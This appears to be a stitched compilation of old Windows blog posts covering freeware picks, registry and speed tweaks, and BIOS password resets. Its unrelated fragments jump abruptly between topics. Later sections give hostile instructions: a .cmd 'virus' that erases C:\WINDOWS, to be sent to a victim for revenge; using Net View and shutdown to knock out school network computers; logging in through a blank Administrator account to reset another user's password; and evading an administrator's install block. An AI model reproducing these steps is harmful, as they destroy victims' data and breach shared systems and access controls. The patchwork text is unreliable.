VLC Media Player is a lightweight multimedia player that plays most video and audio formats out there, including CDs and DVDs, without the need for codecs. It’s a thousand times better than the default Windows Media Player. I use VLC as my default video player.

2. iTunes

Apple’s iTunes is the best music player I’ve found. I recommend you use it as your default audio player. And you have to install it anyway if you own an iPod or an iPhone.

3. PeaZip

PeaZip can manage most of the compression protocols out there like zip, rar, gzip, 7zip etc. I’m yet to come across another compression utility that can handle so many compression formats and still look very neat. Alternatives are WinRAR and 7zip.

4. Mozilla Firefox

Mozilla Firefox – the best browser ever made. Its unlimited extensibility is what’s great about it. You can download hundreds of plugins to match your tastes.

5. Picasa

Picasa is the program for managing and organizing photos. It lets you find, edit, and share all your photos with ease. Picasa makes editing your photos a piece of cake by putting one-click effects at your fingertips. You can share your pics using Picasa by email, print, CDs, or by posting on your blog. This is a must-have, if you ask me.

6. RadarSync

Keep your apps and drivers up-to-date for free with RadarSync. Keeping your software and hardware drivers up-to-date can be a nerve-wracking task but it doesn’t have to be. All you have to do is just run RadarSync occasionally. Stop wasting time looking for updates, instead get RadarSync.

A nice alternative is FileHippo Update Checker, although it only checks for apps (mostly freeware) on its database.

7. SUPER

SUPER is a great app for those who want to convert videos from one format to another. The great thing about SUPER is that it allows you to customize the output of your audio/video file, and it supports just about any format. The only problem is that SUPER can be a bit confusing for new users.
If you’re not a geek, then my guess is that FormatFactory will be better for you.

8. Roboform

RoboForm cuts out the time you spend filling various forms online, it remembers all your passwords, and even features a random password generator for the security freaks among us. What more could you possibly ask for?

9. Lavasoft Ad-Aware 2008 Free

Ad-Aware is an excellent anti-spyware app that provides protection from select trojans, malware, dialers, and browser hijackers.

10. Infrarecorder

If you have a DVD/CD writer then Infrarecorder is for you. The in-built windows disk writing utility is just too clunky, and well, broken. Infrarecorder allows you to do a lot of things, such as making your own video disks, music CDs, backup your data etc.

11. AVG / Avast

Make sure to install a firewall and anti-virus app on that new PC of yours. As you know, the built in Windows Firewall is just not enough. I recommend you get either AVG or Avast. They offer the best protection in the industry, and more importantly, they are freeware.

12. OpenOffice

For those who don’t want to pony-up for Microsoft Office, the open-source OpenOffice.org is a good alternative. It’s got the apps that you’ll want, but it’s only a bit slow.

I have tried many security softwares. Bitdefender, Mcafee, KIS to name a few. But I personally feel that Eset NOD32 Smart security is the best. The only reason is that it is not a resource log like the other softwares. At the same time it does the job that it is supposed to do. Protect Yourself Against Keyloggers !!

If you are at an internet cafe or a friends house you might not have the time to scan for viruses or keyloggers. (Unless you have a portable scanner on your USB stick)

Keyloggers dont record mouse strokes, right?

Well if you skipped a letter when typing your password and then used your mouse to go back and type that letter in, it would appear jumbled to the keylogger. For example:

If my password was animals58

I could type amiansl85 then with my mouse I would click and sort em off!

So to the keylogger would see the password as

animals85

You can also use On Screen keybord, or Copy paste the letters via notepad or so :)

Registry Trick

Wanna change the Title Bar of Internet Explorer to something Kewl....!!!
Try this out...

1. Go to Start-> Run -> Type regedit (Press Yes in next Dialog Box)
2. Go to HKEY_CURRENT_USER -> Software -> Microsoft -> Internet Explorer -> Main
3. Right click in the blank space in the right side and select New-> String Value
4. A New String Appears in the list. Rename it to Window Title
5. Double click the string and enter Value Data as 'Hacked By CyberNeedZ' or anything else that u want to see...!!!

U can also Automate this by making a reg File

1. Go to Start -> Run -> Type notepad & Hit Enter
2. Copy & paste the following code to notepad

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="Ur Text Here"

U can edit the text to whatever u want!!!
3. Save the File as Title.reg

A web standards checklist

The term web standards can mean different things to different people. For some, it is 'table-free sites', for others it is 'using valid code'. However, web standards are much broader than that. A site built to web standards should adhere to standards (HTML, XHTML, XML, CSS, XSLT, DOM, MathML, SVG etc) and pursue best practices (valid code, accessible code, semantically correct code, user-friendly URLs etc).

In other words, a site built to web standards should ideally be lean, clean, CSS-based, accessible, usable and search engine friendly.

About the checklist

This is not an uber-checklist. There are probably many items that could be added. More importantly, it should not be seen as a list of items that must be addressed on every site that you develop. It is simply a guide that can be used:

A Favicon is a multi-resolution image included on nearly all professionally developed sites. The Favicon allows the webmaster to further promote their site, and to create a more customized appearance within a visitor's browser.

Favicons are definitely not critical. However, if they are not present, they can cause 404 errors in your logs (site statistics). Browsers like IE will request them from the server when a site is bookmarked. If a favicon isn't available, a 404 error may be generated. 1. Wallpapers: They slow your whole system down, so if you're willing to compromise, have a basic plain one instead!

2. Drivers: Update your hardware drivers as frequently as possible. New drivers tend to increase system speed especially in the case of graphics cards, their drivers are updated by the manufacturer very frequently!

3. Minimizing: If you want to use several programs at the same time then minimize those you are not using. This helps reduce the overload on RAM.

4. Boot Faster: The 'starting Windows 95/98' message on startup can delay your booting for a couple of seconds. To get rid of this message go to c:\ and find the file Msdos.sys. Remove the Read-Only option. Next, open it in Notepad or any other text editor. Finally, go to the text 'Options' within the file and make the following changes: Add BootDelay=0. To make your booting even faster, set add Logo=0 to remove the Windows logo at startup.

5. Restart only Windows: When restarting your PC, hold down Shift to only restart Windows rather than the whole system which will only take a fraction of the time.

6. Turn Off Animations: Go to Display Settings from the Control Panel and switch to the Effects Tab. Now turn off Show Windows Content While Dragging and Smooth Edges on Screen Fonts. This tip is also helpful with Windows XP because of the various fade/scroll effects.

7. Faster Start-Menu Access: Go to the Start menu and select Run. Now type Regedit and hit Enter. The Registry Editor will appear on the screen. Now, open the folder HKEY_CURRENT_USER\Control Panel\Desktop. You should see a MenuShowDelay value. If you don't then do the following: right click on a blank space in the right pane and select New\String. Change the name in the new value to MenuShowDelay. Now that we have the MenuShowDelay value, double click on it and enter 0 in the value data field. This sets the start menu delay to 0 milliseconds.

8. Resolutions: If you are willing to do anything for faster performance from your PC, then try lowering your display resolution. The lower it is, the faster your PC.

9. Turn off Active Desktop: Go to your Display Properties and switch to the Web tab. Uncheck View My Active Desktop As a Web Page. Since the Active Desktop option under Windows 98 uses a lot of system resources, this option can have a dramatic effect on the speed of the whole system.

10. Defragment Often: Windows 98's Defrag tool uses Application Acceleration from Intel which means that when you defragment your drive, data is physically arranged on the drive so that applications will load faster.

11. Take your PC to Bed: Using the Advanced Power Management feature under Windows 98 gives you the option to use the sleep command. That way, you can send your PC to sleep instead of shutting it down and then restarting it. It's as simple as pressing a button and then pressing the same button to wake it up. 18. Stretching Wallpapers: Don't "stretch" your wallpaper in Windows 98 since it actually slows Windows down when you drag icons around on the desktop.

To search your hard disk to find and display the file names on drive C: that contain the string "Google" use the pipe (|) to direct the results of a dir command to find as follows:

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.

Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.

Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.

Actually this is a vulnerability and an option and not a hack.

Normally while windows xp is installed the password for the Administrator account is left blank.Later users put their names as usernames and set a password.
Here is the catch.There is now 2 administrators.

Now hacking ANGEL is our task.We log on to Administrator which doesnt need any password.For this at the log on screen press ctrl+alt+del(twice).
The classical prompt appears and u can type 'Administrator' in the username field and u r logged on.

'control userpasswords2'.Now select ANGEL and click 'Resest password'.

Voila!!Its done and u can now log off and enter ANGEL.

Now XP wont ask for password next time You Login. Also

Go to the cmd prompt .
Type net user *.
It will list all the users.
Again type net user "administrator" or the name of the administrator "name" *.

It will ask for the password.
Type the password and there you are done.
Logging In As Administrator:

Hold the Ctrl-Alt key and press Del twice. This will bring up the normal login and you can log on as Administrator.

The only thing you need is Notepad.
Now, to test it, create a textfile called myfile.txt(empty) in C:\
Now in your notepad type "erase C:\myfile.txt" (without the quotes). Then do "Save As..." and save it as "myfile.cmd".
Now run the file "myfile.cmd" and go to C:\ and you'll see your myfile.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.

You wanna mess around with your school network?

You wanna own the shit out of some kiddies who think they're the best?

Well thankfully there's the shutdown function in cmd Smile

First of all you need to have access to a cmd prompt on the network for this to work.

If it's disabled you can obviously run everything from .bat files.

So first type in
Code:
Net View

This will give you all the names for all the computers on the network.

Then you want to find a target and write it down, so for example a name is //045-comproom1-05 then you will utilize that name to shutdown the computer.

What next? Well if you're a lil skiddy yourself then the easiest thing to do is type in

shutdown -i

which will give you a gui interface and you'll be able to shutdown whichever computer you want with it, you can set a time, even throw in a funny comment like "owned" or somethin Smile.

commands you will use if you just wanna use the command interface are

- shutsdown the pc.

shutdown with a comment.

How to install programs and games in a limited account meaning an account thats not an administrator

This might not always work but it's pretty useful because your able to install programs although your administrator has bloked it.
Steps
1. When your installing the program here is what you have to do.
2. When it gives you the option of choosing the directory or destination where the program will be intall, before clicking next click browse to choose a different destination.
3. The destination your going to choose is
C:\Documents and Settings\"your username"\"name of program being installed"\
4. So just browse to
The C:\ drive
Then Documents and Settings
Then your User Name
5. The reason why you do this is because since your intalling it in your account name the computer doesn't stop or check anything because its your account and your name, but if you just select the desktop and choose to install it there it going to say something like "you do not have enough administrative privileges" something like that.
